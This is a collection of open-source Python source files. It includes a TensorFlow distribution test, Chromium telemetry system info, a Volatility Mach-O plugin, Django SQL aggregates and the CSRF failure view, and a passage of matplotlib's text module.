  a batch of multivariate normals.
  """

  def _cls(self):
    # Indirection point so subclasses can rerun these tests against a
    # different distribution class.
    return ds.TransformedDistribution
  def setUp(self):
    # Affine parameters shared by all tests: batch of 2 shift vectors
    # (broadcast from one) and 2 lower-triangular 3x3 scale matrices.
    self._shift = np.array([-1, 0, 1], dtype=np.float32)
    self._tril = np.array([[[1., 0, 0],
                            [2, 1, 0],
                            [3, 2, 1]],
                           [[2, 0, 0],
                            [3, 2, 0],
                            [4, 3, 2]]],
                          dtype=np.float32)
  def _testMVN(self,
               base_distribution_class,
               base_distribution_kwargs,
               batch_shape=(),
               event_shape=(),
               not_implemented_message=None):
    # Builds the transformed distribution twice -- once with static and
    # once with placeholder (dynamic) shape overrides -- and checks both
    # against scipy's multivariate_normal.
    with self.test_session() as sess:
      # Overriding shapes must be compatible w/bijector; most bijectors are
      # batch_shape agnostic and only care about event_ndims.
      # In the case of `Affine`, if we got it wrong then it would fire an
      # exception due to incompatible dimensions.
      batch_shape_pl = array_ops.placeholder(
          dtypes.int32, name="dynamic_batch_shape")
      event_shape_pl = array_ops.placeholder(
          dtypes.int32, name="dynamic_event_shape")
      feed_dict = {batch_shape_pl: np.array(batch_shape, dtype=np.int32),
                   event_shape_pl: np.array(event_shape, dtype=np.int32)}
      fake_mvn_dynamic = self._cls()(
          distribution=base_distribution_class(validate_args=True,
                                               **base_distribution_kwargs),
          bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
          batch_shape=batch_shape_pl,
          event_shape=event_shape_pl,
          validate_args=True)
      fake_mvn_static = self._cls()(
          distribution=base_distribution_class(validate_args=True,
                                               **base_distribution_kwargs),
          bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
          batch_shape=batch_shape,
          event_shape=event_shape,
          validate_args=True)
      actual_mean = np.tile(self._shift, [2, 1])  # Affine elided this tile.
      actual_cov = np.matmul(self._tril, np.transpose(self._tril, [0, 2, 1]))
      # scipy reference densities/entropy, one per batch member.
      def actual_mvn_log_prob(x):
        return np.concatenate([
            [stats.multivariate_normal(
                actual_mean[i], actual_cov[i]).logpdf(x[:, i, :])]
            for i in range(len(actual_cov))]).T
      actual_mvn_entropy = np.concatenate([
          [stats.multivariate_normal(
              actual_mean[i], actual_cov[i]).entropy()]
          for i in range(len(actual_cov))])
      self.assertAllEqual([3], fake_mvn_static.event_shape)
      self.assertAllEqual([2], fake_mvn_static.batch_shape)
      # Dynamic overrides make the static shapes unknown.
      self.assertAllEqual(tensor_shape.TensorShape(None),
                          fake_mvn_dynamic.event_shape)
      self.assertAllEqual(tensor_shape.TensorShape(None),
                          fake_mvn_dynamic.batch_shape)
      x = fake_mvn_static.sample(5, seed=0).eval()
      # cdf/survival functions are not defined once shapes are overridden.
      for unsupported_fn in (fake_mvn_static.log_cdf,
                             fake_mvn_static.cdf,
                             fake_mvn_static.survival_function,
                             fake_mvn_static.log_survival_function):
        with self.assertRaisesRegexp(NotImplementedError,
                                     not_implemented_message):
          unsupported_fn(x)
      num_samples = 5e3
      for fake_mvn, feed_dict in ((fake_mvn_static, {}),
                                  (fake_mvn_dynamic, feed_dict)):
        # Ensure sample works by checking first, second moments.
        y = fake_mvn.sample(int(num_samples), seed=0)
        x = y[0:5, ...]
        sample_mean = math_ops.reduce_mean(y, 0)
        centered_y = array_ops.transpose(y - sample_mean, [1, 2, 0])
        sample_cov = math_ops.matmul(
            centered_y, centered_y, transpose_b=True) / num_samples
        [
            sample_mean_,
            sample_cov_,
            x_,
            fake_event_shape_,
            fake_batch_shape_,
            fake_log_prob_,
            fake_prob_,
            fake_entropy_,
        ] = sess.run([
            sample_mean,
            sample_cov,
            x,
            fake_mvn.event_shape_tensor(),
            fake_mvn.batch_shape_tensor(),
            fake_mvn.log_prob(x),
            fake_mvn.prob(x),
            fake_mvn.entropy(),
        ], feed_dict=feed_dict)
        self.assertAllClose(actual_mean, sample_mean_, atol=0.1, rtol=0.1)
        self.assertAllClose(actual_cov, sample_cov_, atol=0., rtol=0.1)
        # Ensure all other functions work as intended.
        self.assertAllEqual([5, 2, 3], x_.shape)
        self.assertAllEqual([3], fake_event_shape_)
        self.assertAllEqual([2], fake_batch_shape_)
        self.assertAllClose(actual_mvn_log_prob(x_), fake_log_prob_,
                            atol=0., rtol=1e-6)
        self.assertAllClose(np.exp(actual_mvn_log_prob(x_)), fake_prob_,
                            atol=0., rtol=1e-5)
        self.assertAllClose(actual_mvn_entropy, fake_entropy_,
                            atol=0., rtol=1e-6)
  def testScalarBatchScalarEvent(self):
    self._testMVN(
        base_distribution_class=ds.Normal,
        base_distribution_kwargs={"loc": 0., "scale": 1.},
        batch_shape=[2],
        event_shape=[3],
        not_implemented_message="not implemented when overriding event_shape")
  def testScalarBatchNonScalarEvent(self):
    self._testMVN(
        base_distribution_class=ds.MultivariateNormalDiag,
        base_distribution_kwargs={"loc": [0., 0., 0.],
                                  "scale_diag": [1., 1, 1]},
        batch_shape=[2],
        not_implemented_message="not implemented")
    with self.test_session():
      # Can't override event_shape for scalar batch, non-scalar event.
      with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
        self._cls()(
            distribution=ds.MultivariateNormalDiag(loc=[0.], scale_diag=[1.]),
            bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
            batch_shape=[2],
            event_shape=[3],
            validate_args=True)
  def testNonScalarBatchScalarEvent(self):
    self._testMVN(
        base_distribution_class=ds.Normal,
        base_distribution_kwargs={"loc": [0., 0], "scale": [1., 1]},
        event_shape=[3],
        not_implemented_message="not implemented when overriding event_shape")
    with self.test_session():
      # Can't override batch_shape for non-scalar batch, scalar event.
      with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
        self._cls()(
            distribution=ds.Normal(loc=[0.], scale=[1.]),
            bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
            batch_shape=[2],
            event_shape=[3],
            validate_args=True)
  def testNonScalarBatchNonScalarEvent(self):
    with self.test_session():
      # Can't override event_shape and/or batch_shape for non_scalar batch,
      # non-scalar event.
      with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
        self._cls()(
            distribution=ds.MultivariateNormalDiag(loc=[[0.]],
                                                   scale_diag=[[1.]]),
            bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
            batch_shape=[2],
            event_shape=[3],
            validate_args=True)
# Standard TensorFlow test-runner entry point.
if __name__ == "__main__":
  test.main()
| apache-2.0 |
MyAOSP/external_chromium_org | tools/telemetry/telemetry/core/system_info.py | 38 | 1446 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.core import gpu_info
class SystemInfo(object):
  """Provides low-level system information.

  Instances are normally built from a browser-supplied attribute
  dictionary via FromDict rather than constructed directly.
  """
  def __init__(self, model_name, gpu_dict):
    # Identity comparison (is None) instead of == None; both arguments
    # are required, although model_name may be the empty string.
    if (model_name is None) or (gpu_dict is None):
      raise Exception("Missing model_name or gpu_dict argument")
    self._model_name = model_name
    self._gpu = gpu_info.GPUInfo.FromDict(gpu_dict)
  @classmethod
  def FromDict(cls, attrs):
    """Constructs a SystemInfo from a dictionary of attributes.
    Attributes currently required to be present in the dictionary:
      model_name (string): a platform-dependent string
        describing the model of machine, or the empty string if not
        supported.
      gpu (object containing GPUInfo's required attributes)
    """
    return cls(attrs["model_name"], attrs["gpu"])
  @property
  def model_name(self):
    """A string describing the machine model.

    This is a highly platform-dependent value and not currently
    specified for any machine type aside from Macs. On Mac OS, this
    is the model identifier, reformatted slightly; for example,
    'MacBookPro 10.1'."""
    return self._model_name
  @property
  def gpu(self):
    """A GPUInfo object describing the graphics processor(s) on the system."""
    return self._gpu
| bsd-3-clause |
DarrenRainey/volatility | volatility/plugins/machoinfo.py | 58 | 1502 | # Volatility
# Copyright (C) 2009-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
import volatility.plugins.crashinfo as crashinfo
class MachOInfo(crashinfo.CrashInfo):
    """Dump Mach-O file format information"""
    # Restrict this plugin to address spaces backed by a Mach-O file.
    target_as = ['MachOAddressSpace']
    def render_text(self, outfd, data):
        """Write the Mach-O header summary and a table of segments
        (file offset, memory offset, size, name) to outfd."""
        header = data.get_header()
        outfd.write("Magic: {0:#x}\n".format(header.magic))
        outfd.write("Architecture: {0}-bit\n".format(data.bits))
        self.table_header(outfd, [("File Offset", "[addrpad]"),
                                  ("Memory Offset", "[addrpad]"),
                                  ("Size", "[addrpad]"),
                                  ("Name", "")])
        for seg in data.segs:
            self.table_row(outfd, seg.fileoff, seg.vmaddr, seg.vmsize, seg.segname)
| gpl-2.0 |
trezorg/django | django/db/models/sql/aggregates.py | 277 | 4176 | """
Classes to represent the default SQL aggregate functions
"""
class AggregateField(object):
    """Minimal stand-in for a model field.

    The data-conversion parts of the database backend only ever ask a
    field for its internal type when coercing values coming back from
    the database, so this mockup records that single piece of
    information and answers the same ``get_internal_type()`` query a
    real field would.
    """
    def __init__(self, internal_type):
        self.internal_type = internal_type

    def get_internal_type(self):
        return self.internal_type
# Shared singletons handed out by Aggregate.__init__: ordinal aggregates
# (counts) coerce to int, computed aggregates (averages, variances)
# coerce to float.
ordinal_aggregate_field = AggregateField('IntegerField')
computed_aggregate_field = AggregateField('FloatField')
class Aggregate(object):
    """Base class for the default SQL aggregate functions."""
    is_ordinal = False
    is_computed = False
    sql_template = '%(function)s(%(field)s)'

    def __init__(self, col, source=None, is_summary=False, **extra):
        """Instantiate an SQL aggregate.

        ``col`` is a column reference describing the subject field of
        the aggregate: an alias string, an object providing ``as_sql``,
        or a (table, column) pair. ``source`` is the underlying field or
        aggregate definition for that column; unless this aggregate is
        an ordinal or computed type, ``source`` determines the coerced
        output type. Any additional keyword arguments are stored in
        ``extra`` and made available to ``sql_template``.

        Subclasses configure behaviour through the class attributes
        ``sql_function`` (name of the SQL function), ``sql_template``
        (render template), ``is_ordinal`` (integer output, e.g. a
        count) and ``is_computed`` (float output regardless of input,
        e.g. an average).
        """
        self.col = col
        self.source = source
        self.is_summary = is_summary
        self.extra = extra

        # Walk the chain of aggregate sources until an actual field is
        # reached, or until an aggregate that forces a particular output
        # type is found. The resulting field is used to coerce values
        # retrieved from the database.
        node = self
        while node and isinstance(node, Aggregate):
            if getattr(node, 'is_ordinal', False):
                node = ordinal_aggregate_field
            elif getattr(node, 'is_computed', False):
                node = computed_aggregate_field
            else:
                node = node.source
        self.field = node

    def relabel_aliases(self, change_map):
        # Only (table, column) references carry an alias to remap.
        col = self.col
        if isinstance(col, (list, tuple)):
            self.col = (change_map.get(col[0], col[0]), col[1])

    def as_sql(self, qn, connection):
        """Return the aggregate, rendered as SQL."""
        col = self.col
        if hasattr(col, 'as_sql'):
            field_name = col.as_sql(qn, connection)
        elif isinstance(col, (list, tuple)):
            field_name = '.'.join(qn(part) for part in col)
        else:
            field_name = col
        # NB: entries in self.extra deliberately override 'function' and
        # 'field' if a caller supplies them.
        params = {'function': self.sql_function, 'field': field_name}
        params.update(self.extra)
        return self.sql_template % params
class Avg(Aggregate):
    # AVG always yields a float, whatever the input column type.
    is_computed = True
    sql_function = 'AVG'
class Count(Aggregate):
    """COUNT aggregate; always produces an integer result."""
    is_ordinal = True
    sql_function = 'COUNT'
    sql_template = '%(function)s(%(distinct)s%(field)s)'
    def __init__(self, col, distinct=False, **extra):
        # Conditional expression instead of the error-prone
        # ``x and a or b`` idiom (which misbehaves when ``a`` is falsy).
        super(Count, self).__init__(
            col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
    # Output type follows the aggregated column's type.
    sql_function = 'MAX'
class Min(Aggregate):
    # Output type follows the aggregated column's type.
    sql_function = 'MIN'
class StdDev(Aggregate):
    """Standard deviation; ``sample=True`` selects the sample (n-1)
    variant, otherwise the population variant is used."""
    is_computed = True
    def __init__(self, col, sample=False, **extra):
        super(StdDev, self).__init__(col, **extra)
        # Conditional expression instead of ``x and a or b``.
        self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
    # Output type follows the aggregated column's type.
    sql_function = 'SUM'
class Variance(Aggregate):
    """Variance; ``sample=True`` selects the sample (n-1) variant,
    otherwise the population variant is used."""
    is_computed = True
    def __init__(self, col, sample=False, **extra):
        super(Variance, self).__init__(col, **extra)
        # Conditional expression instead of ``x and a or b``.
        self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
| bsd-3-clause |
Gagaro/django | django/views/csrf.py | 30 | 5505 | from django.conf import settings
from django.http import HttpResponseForbidden
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.translation import ugettext as _
from django.utils.version import get_docs_version
# We include the template inline since we need to be able to reliably display
# this error message, especially for the sake of developers, and there isn't any
# other way of making it available independent of what is in the settings file.
# Only the text appearing with DEBUG=False is translated. Normal translation
# tags cannot be used with this inline templates as makemessages would not be
# able to discover the strings.
CSRF_FAILURE_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>403 Forbidden</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
#info { background:#f6f6f6; }
#info ul { margin: 0.5em 4em; }
#info p, #summary p { padding-top:10px; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ title }} <span>(403)</span></h1>
<p>{{ main }}</p>
{% if no_referer %}
<p>{{ no_referer1 }}</p>
<p>{{ no_referer2 }}</p>
{% endif %}
{% if no_cookie %}
<p>{{ no_cookie1 }}</p>
<p>{{ no_cookie2 }}</p>
{% endif %}
</div>
{% if DEBUG %}
<div id="info">
<h2>Help</h2>
{% if reason %}
<p>Reason given for failure:</p>
<pre>
{{ reason }}
</pre>
{% endif %}
<p>In general, this can occur when there is a genuine Cross Site Request Forgery, or when
<a
href="https://docs.djangoproject.com/en/{{ docs_version }}/ref/csrf/">Django's
CSRF mechanism</a> has not been used correctly. For POST forms, you need to
ensure:</p>
<ul>
<li>Your browser is accepting cookies.</li>
<li>The view function passes a <code>request</code> to the template's <a
href="https://docs.djangoproject.com/en/dev/topics/templates/#django.template.backends.base.Template.render"><code>render</code></a>
method.</li>
<li>In the template, there is a <code>{% templatetag openblock %} csrf_token
{% templatetag closeblock %}</code> template tag inside each POST form that
targets an internal URL.</li>
<li>If you are not using <code>CsrfViewMiddleware</code>, then you must use
<code>csrf_protect</code> on any views that use the <code>csrf_token</code>
template tag, as well as those that accept the POST data.</li>
</ul>
<p>You're seeing the help section of this page because you have <code>DEBUG =
True</code> in your Django settings file. Change that to <code>False</code>,
and only the initial error message will be displayed. </p>
<p>You can customize this page using the CSRF_FAILURE_VIEW setting.</p>
</div>
{% else %}
<div id="explanation">
<p><small>{{ more }}</small></p>
</div>
{% endif %}
</body>
</html>
"""
# Template looked up first; the inline string template above is the fallback.
CSRF_FAILURE_TEMPLATE_NAME = "403_csrf.html"
def csrf_failure(request, reason="", template_name=CSRF_FAILURE_TEMPLATE_NAME):
    """
    Default view used when request fails CSRF protection

    ``reason`` is the middleware's rejection reason and is compared
    against the known REASON_* constants to pick which explanatory
    paragraphs to show. ``template_name`` may be overridden via the
    CSRF_FAILURE_VIEW setting machinery; if the default template does
    not exist, the built-in inline template is used instead.
    """
    # Imported locally to avoid a circular import with the middleware.
    from django.middleware.csrf import REASON_NO_REFERER, REASON_NO_CSRF_COOKIE
    c = Context({
        'title': _("Forbidden"),
        'main': _("CSRF verification failed. Request aborted."),
        'reason': reason,
        'no_referer': reason == REASON_NO_REFERER,
        'no_referer1': _(
            "You are seeing this message because this HTTPS site requires a "
            "'Referer header' to be sent by your Web browser, but none was "
            "sent. This header is required for security reasons, to ensure "
            "that your browser is not being hijacked by third parties."),
        'no_referer2': _(
            "If you have configured your browser to disable 'Referer' headers, "
            "please re-enable them, at least for this site, or for HTTPS "
            "connections, or for 'same-origin' requests."),
        'no_cookie': reason == REASON_NO_CSRF_COOKIE,
        'no_cookie1': _(
            "You are seeing this message because this site requires a CSRF "
            "cookie when submitting forms. This cookie is required for "
            "security reasons, to ensure that your browser is not being "
            "hijacked by third parties."),
        'no_cookie2': _(
            "If you have configured your browser to disable cookies, please "
            "re-enable them, at least for this site, or for 'same-origin' "
            "requests."),
        'DEBUG': settings.DEBUG,
        'docs_version': get_docs_version(),
        'more': _("More information is available with DEBUG=True."),
    })
    try:
        t = loader.get_template(template_name)
    except TemplateDoesNotExist:
        if template_name == CSRF_FAILURE_TEMPLATE_NAME:
            # If the default template doesn't exist, use the string template.
            t = Engine().from_string(CSRF_FAILURE_TEMPLATE)
        else:
            # Raise if a developer-specified template doesn't exist.
            raise
    return HttpResponseForbidden(t.render(c), content_type='text/html')
| bsd-3-clause |
dimroc/tensorflow-mnist-tutorial | lib/python3.6/site-packages/matplotlib/text.py | 10 | 82852 | """
Classes for including text in a figure.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from six.moves import zip
import math
import warnings
import contextlib
import numpy as np
from matplotlib import cbook
from matplotlib import rcParams
import matplotlib.artist as artist
from matplotlib.artist import Artist
from matplotlib.cbook import is_string_like, maxdict
from matplotlib import docstring
from matplotlib.font_manager import FontProperties
from matplotlib.patches import FancyBboxPatch
from matplotlib.patches import FancyArrowPatch, Rectangle
import matplotlib.transforms as mtransforms
from matplotlib.transforms import Affine2D, Bbox, Transform
from matplotlib.transforms import BboxBase, BboxTransformTo
from matplotlib.lines import Line2D
from matplotlib.path import Path
from matplotlib.artist import allow_rasterization
from matplotlib.backend_bases import RendererBase
from matplotlib.textpath import TextPath
def _process_text_args(override, fontdict=None, **kwargs):
"Return an override dict. See :func:`~pyplot.text' docstring for info"
if fontdict is not None:
override.update(fontdict)
override.update(kwargs)
return override
@contextlib.contextmanager
def _wrap_text(textobj):
"""
Temporarily inserts newlines to the text if the wrap option is enabled.
"""
if textobj.get_wrap():
old_text = textobj.get_text()
try:
textobj.set_text(textobj._get_wrapped_text())
yield textobj
finally:
textobj.set_text(old_text)
else:
yield textobj
# Extracted from Text's method to serve as a function
def get_rotation(rotation):
    """
    Return the text angle as float between 0 and 360 degrees.

    *rotation* may be 'horizontal' (or None, treated as horizontal),
    'vertical', or a numeric value in degrees.

    Raises ValueError for any other input.
    """
    try:
        return float(rotation) % 360
    except (ValueError, TypeError):
        pass
    # Equality against a string literal already implies a string-like
    # value, so no explicit isinstance check is needed here.
    if rotation is None or rotation == 'horizontal':
        return 0.
    if rotation == 'vertical':
        return 90.
    # Pre-fix message concatenated to "...'horizontal' 'vertical', numeric
    # value orNone"; separators restored.
    raise ValueError("rotation is {0!r} expected either 'horizontal', "
                     "'vertical', a numeric value, or None".format(rotation))
# these are not available for the object inspector until after the
# class is build so we define an initial set here for the init
# function and they will be overridden after object defn
docstring.interpd.update(Text="""
========================== ================================================
Property Value
========================== ================================================
alpha float or None
animated [True | False]
backgroundcolor any matplotlib color
bbox rectangle prop dict plus key 'pad' which is a
pad in points; if a boxstyle is supplied as
a string, then pad is instead a fraction
of the font size
clip_box a matplotlib.transform.Bbox instance
clip_on [True | False]
color any matplotlib color
family ['serif' | 'sans-serif' | 'cursive' |
'fantasy' | 'monospace']
figure a matplotlib.figure.Figure instance
fontproperties a matplotlib.font_manager.FontProperties
instance
horizontalalignment or ha ['center' | 'right' | 'left']
label any string
linespacing float
lod [True | False]
multialignment ['left' | 'right' | 'center' ]
name or fontname string e.g.,
['Sans' | 'Courier' | 'Helvetica' ...]
position (x,y)
rotation [ angle in degrees 'vertical' | 'horizontal'
rotation_mode [ None | 'anchor']
size or fontsize [size in points | relative size e.g., 'smaller',
'x-large']
style or fontstyle [ 'normal' | 'italic' | 'oblique']
text string
transform a matplotlib.transform transformation instance
usetex [True | False | None]
variant ['normal' | 'small-caps']
verticalalignment or va ['center' | 'top' | 'bottom' | 'baseline' |
'center_baseline' ]
visible [True | False]
weight or fontweight ['normal' | 'bold' | 'heavy' | 'light' |
'ultrabold' | 'ultralight']
wrap [True | False]
x float
y float
zorder any number
========================== ===============================================
""")
# TODO : This function may move into the Text class as a method. As a
# matter of fact, The information from the _get_textbox function
# should be available during the Text._get_layout() call, which is
# called within the _get_textbox. So, it would better to move this
# function as a method with some refactoring of _get_layout method.
def _get_textbox(text, renderer):
    """
    Calculate the bounding box of the text. Unlike
    :meth:`matplotlib.text.Text.get_extents` method, The bbox size of
    the text before the rotation is calculated.
    """
    theta = np.deg2rad(text.get_rotation())
    unrotate = mtransforms.Affine2D().rotate(-theta)

    _, parts, descent = text._get_layout(renderer)

    # Project every line's corners into the unrotated frame.
    xs = []
    ys = []
    for _, (w, h), x, y in parts:
        x0, y0 = unrotate.transform_point((x, y))
        y0 -= descent
        xs.extend([x0, x0 + w])
        ys.extend([y0, y0 + h])

    left, bottom = min(xs), min(ys)
    width = max(xs) - left
    height = max(ys) - bottom

    # Map the lower-left corner back into the rotated frame.
    rotate = mtransforms.Affine2D().rotate(theta)
    x_box, y_box = rotate.transform_point((left, bottom))

    return x_box, y_box, width, height
class Text(Artist):
"""
Handle storing and drawing of text in window or data coordinates.
"""
zorder = 3
_cached = maxdict(50)
    def __str__(self):
        # Debug-friendly summary: raw (pre-unit-conversion) position plus
        # the repr of the displayed string.
        return "Text(%g,%g,%s)" % (self._x, self._y, repr(self._text))
def __init__(self,
x=0, y=0, text='',
color=None, # defaults to rc params
verticalalignment='baseline',
horizontalalignment='left',
multialignment=None,
fontproperties=None, # defaults to FontProperties()
rotation=None,
linespacing=None,
rotation_mode=None,
usetex=None, # defaults to rcParams['text.usetex']
wrap=False,
**kwargs
):
"""
Create a :class:`~matplotlib.text.Text` instance at *x*, *y*
with string *text*.
Valid kwargs are
%(Text)s
"""
Artist.__init__(self)
self._x, self._y = x, y
if color is None:
color = rcParams['text.color']
if fontproperties is None:
fontproperties = FontProperties()
elif is_string_like(fontproperties):
fontproperties = FontProperties(fontproperties)
self.set_text(text)
self.set_color(color)
self.set_usetex(usetex)
self.set_wrap(wrap)
self._verticalalignment = verticalalignment
self._horizontalalignment = horizontalalignment
self._multialignment = multialignment
self._rotation = rotation
self._fontproperties = fontproperties
self._bbox_patch = None # a FancyBboxPatch instance
self._renderer = None
if linespacing is None:
linespacing = 1.2 # Maybe use rcParam later.
self._linespacing = linespacing
self.set_rotation_mode(rotation_mode)
self.update(kwargs)
    def update(self, kwargs):
        """
        Update properties from a dictionary.
        """
        # Pull 'bbox' out first: set_bbox() reads the font size
        # (see its pad computation), so it must run only after the
        # generic property update has been applied.
        bbox = kwargs.pop('bbox', None)
        super(Text, self).update(kwargs)
        if bbox:
            self.set_bbox(bbox)  # depends on font properties
def __getstate__(self):
d = super(Text, self).__getstate__()
# remove the cached _renderer (if it exists)
d['_renderer'] = None
return d
def contains(self, mouseevent):
"""Test whether the mouse event occurred in the patch.
In the case of text, a hit is true anywhere in the
axis-aligned bounding-box containing the text.
Returns True or False.
"""
if six.callable(self._contains):
return self._contains(self, mouseevent)
if not self.get_visible() or self._renderer is None:
return False, {}
l, b, w, h = self.get_window_extent().bounds
r, t = l + w, b + h
x, y = mouseevent.x, mouseevent.y
inside = (l <= x <= r and b <= y <= t)
cattr = {}
# if the text has a surrounding patch, also check containment for it,
# and merge the results with the results for the text.
if self._bbox_patch:
patch_inside, patch_cattr = self._bbox_patch.contains(mouseevent)
inside = inside or patch_inside
cattr["bbox_patch"] = patch_cattr
return inside, cattr
def _get_xy_display(self):
'get the (possibly unit converted) transformed x, y in display coords'
x, y = self.get_unitless_position()
return self.get_transform().transform_point((x, y))
def _get_multialignment(self):
if self._multialignment is not None:
return self._multialignment
else:
return self._horizontalalignment
def get_rotation(self):
'return the text angle as float in degrees'
return get_rotation(self._rotation) # string_or_number -> number
def set_rotation_mode(self, m):
"""
set text rotation mode. If "anchor", the un-rotated text
will first aligned according to their *ha* and
*va*, and then will be rotated with the alignement
reference point as a origin. If None (default), the text will be
rotated first then will be aligned.
"""
if m is None or m in ["anchor", "default"]:
self._rotation_mode = m
else:
raise ValueError("Unknown rotation_mode : %s" % repr(m))
self.stale = True
def get_rotation_mode(self):
"get text rotation mode"
return self._rotation_mode
def update_from(self, other):
'Copy properties from other to self'
Artist.update_from(self, other)
self._color = other._color
self._multialignment = other._multialignment
self._verticalalignment = other._verticalalignment
self._horizontalalignment = other._horizontalalignment
self._fontproperties = other._fontproperties.copy()
self._rotation = other._rotation
self._picker = other._picker
self._linespacing = other._linespacing
self.stale = True
def _get_layout(self, renderer):
"""
return the extent (bbox) of the text together with
multiple-alignment information. Note that it returns an extent
of a rotated text when necessary.
"""
key = self.get_prop_tup(renderer=renderer)
if key in self._cached:
return self._cached[key]
horizLayout = []
thisx, thisy = 0.0, 0.0
xmin, ymin = 0.0, 0.0
width, height = 0.0, 0.0
lines = self.get_text().split('\n')
whs = np.zeros((len(lines), 2))
horizLayout = np.zeros((len(lines), 4))
# Find full vertical extent of font,
# including ascenders and descenders:
tmp, lp_h, lp_bl = renderer.get_text_width_height_descent('lp',
self._fontproperties,
ismath=False)
offsety = (lp_h - lp_bl) * self._linespacing
baseline = 0
for i, line in enumerate(lines):
clean_line, ismath = self.is_math_text(line, self.get_usetex())
if clean_line:
w, h, d = renderer.get_text_width_height_descent(clean_line,
self._fontproperties,
ismath=ismath)
else:
w, h, d = 0, 0, 0
# For multiline text, increase the line spacing when the
# text net-height(excluding baseline) is larger than that
# of a "l" (e.g., use of superscripts), which seems
# what TeX does.
h = max(h, lp_h)
d = max(d, lp_bl)
whs[i] = w, h
baseline = (h - d) - thisy
thisy -= max(offsety, (h - d) * self._linespacing)
horizLayout[i] = thisx, thisy, w, h
thisy -= d
width = max(width, w)
descent = d
ymin = horizLayout[-1][1]
ymax = horizLayout[0][1] + horizLayout[0][3]
height = ymax - ymin
xmax = xmin + width
# get the rotation matrix
M = Affine2D().rotate_deg(self.get_rotation())
offsetLayout = np.zeros((len(lines), 2))
offsetLayout[:] = horizLayout[:, 0:2]
# now offset the individual text lines within the box
if len(lines) > 1: # do the multiline aligment
malign = self._get_multialignment()
if malign == 'center':
offsetLayout[:, 0] += width / 2.0 - horizLayout[:, 2] / 2.0
elif malign == 'right':
offsetLayout[:, 0] += width - horizLayout[:, 2]
# the corners of the unrotated bounding box
cornersHoriz = np.array(
[(xmin, ymin), (xmin, ymax), (xmax, ymax), (xmax, ymin)],
np.float_)
cornersHoriz[:, 1] -= descent
# now rotate the bbox
cornersRotated = M.transform(cornersHoriz)
txs = cornersRotated[:, 0]
tys = cornersRotated[:, 1]
# compute the bounds of the rotated box
xmin, xmax = txs.min(), txs.max()
ymin, ymax = tys.min(), tys.max()
width = xmax - xmin
height = ymax - ymin
# Now move the box to the target position offset the display
# bbox by alignment
halign = self._horizontalalignment
valign = self._verticalalignment
rotation_mode = self.get_rotation_mode()
if rotation_mode != "anchor":
# compute the text location in display coords and the offsets
# necessary to align the bbox with that location
if halign == 'center':
offsetx = (xmin + width / 2.0)
elif halign == 'right':
offsetx = (xmin + width)
else:
offsetx = xmin
if valign == 'center':
offsety = (ymin + height / 2.0)
elif valign == 'top':
offsety = (ymin + height)
elif valign == 'baseline':
offsety = (ymin + height) - baseline
elif valign == 'center_baseline':
offsety = ymin + height - baseline / 2.0
else:
offsety = ymin
else:
xmin1, ymin1 = cornersHoriz[0]
xmax1, ymax1 = cornersHoriz[2]
if halign == 'center':
offsetx = (xmin1 + xmax1) / 2.0
elif halign == 'right':
offsetx = xmax1
else:
offsetx = xmin1
if valign == 'center':
offsety = (ymin1 + ymax1) / 2.0
elif valign == 'top':
offsety = ymax1
elif valign == 'baseline':
offsety = ymax1 - baseline
elif valign == 'center_baseline':
offsety = (ymin1 + ymax1 - baseline) / 2.0
else:
offsety = ymin1
offsetx, offsety = M.transform_point((offsetx, offsety))
xmin -= offsetx
ymin -= offsety
bbox = Bbox.from_bounds(xmin, ymin, width, height)
# now rotate the positions around the first x,y position
xys = M.transform(offsetLayout)
xys -= (offsetx, offsety)
xs, ys = xys[:, 0], xys[:, 1]
ret = bbox, list(zip(lines, whs, xs, ys)), descent
self._cached[key] = ret
return ret
    def set_bbox(self, rectprops):
        """
        Draw a bounding box around self.

        *rectprops* are any settable properties for a
        :class:`~matplotlib.patches.FancyBboxPatch`,
        e.g., facecolor='red', alpha=0.5.

          t.set_bbox(dict(facecolor='red', alpha=0.5))

        The default boxstyle is 'square'. The mutation
        scale of the FancyBboxPatch is set to the fontsize.
        Passing None removes an existing box.

        ACCEPTS: FancyBboxPatch prop dict
        """
        if rectprops is not None:
            props = rectprops.copy()
            boxstyle = props.pop("boxstyle", None)
            pad = props.pop("pad", None)
            if boxstyle is None:
                boxstyle = "square"
                if pad is None:
                    pad = 4  # points
                # Default style takes pad in points, but FancyBboxPatch
                # expects a fraction of the font size.
                pad /= self.get_size()  # to fraction of font size
            else:
                if pad is None:
                    pad = 0.3
            # boxstyle could be a callable or a string
            if is_string_like(boxstyle) and "pad" not in boxstyle:
                boxstyle += ",pad=%0.2f" % pad
